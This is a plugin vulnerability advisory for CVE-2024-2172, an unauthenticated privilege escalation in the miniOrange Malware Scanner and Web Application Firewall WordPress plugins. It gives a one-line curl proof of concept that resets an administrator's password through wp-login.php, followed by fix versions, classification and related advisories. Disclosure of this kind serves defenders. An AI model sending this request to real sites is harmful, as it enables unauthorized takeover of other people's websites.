Malware Scanner < 4.7.3 and Web Application Firewall < 2.1.2 – Unauthenticated Privilege Escalation | CVE 2024-2172 | Plugin Vulnerabilities

Description

The plugin does not prevent unauthenticated users from resetting any account's password, allowing them to takeover sites by resetting one of its administrators' password.

Proof of Concept

curl --url 'http://vulnerable-site.tld/wp-login.php' --data 'option=mo_wpns_change_password&username=simpleadmin&new_password=P4ssw0rd!&confirm_password=P4ssw0rd!'

Affects Plugins

miniorange-malware-protection

Fixed in 4.7.3

web-application-firewall

Fixed in 2.1.2

References

CVE

URL

https://www.wordfence.com/threat-intel/vulnerabilities/id/6347f588-a3fd-4909-ad57-9d78787b5728

Classification

Type

PRIVESC

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Stiofan

Verified

Yes

WPVDB ID

d95f761f-5385-482a-8c69-560e920267af

Timeline

Publicly Published

2024-03-13 (about 2 years ago)

Added

2024-03-13 (about 2 years ago)

Last Updated

2024-03-25 (about 2 years ago)

Other

Published

Title

Published

2019-12-30

Title

Photo Gallery – Image Gallery by Ape <= 2.0.6 - Authenticated Arbitrary Plugin Deactivation

Published

2022-12-27

Title

Login as User or Customer < 3.3 - Unauthenticated Privilege Escalation to Admin

Published

2023-12-26

Title

ARMember < 4.0.11 - Subscriber+ Privilege Escalation

Published

2023-08-08

Title

Biometric Login for WooCommerce < 1.0.4 - Unauthenticated Privilege Escalation

Published

2024-08-21

Title

LiteSpeed Cache < 6.4 - Unauthenticated Privilege Escalation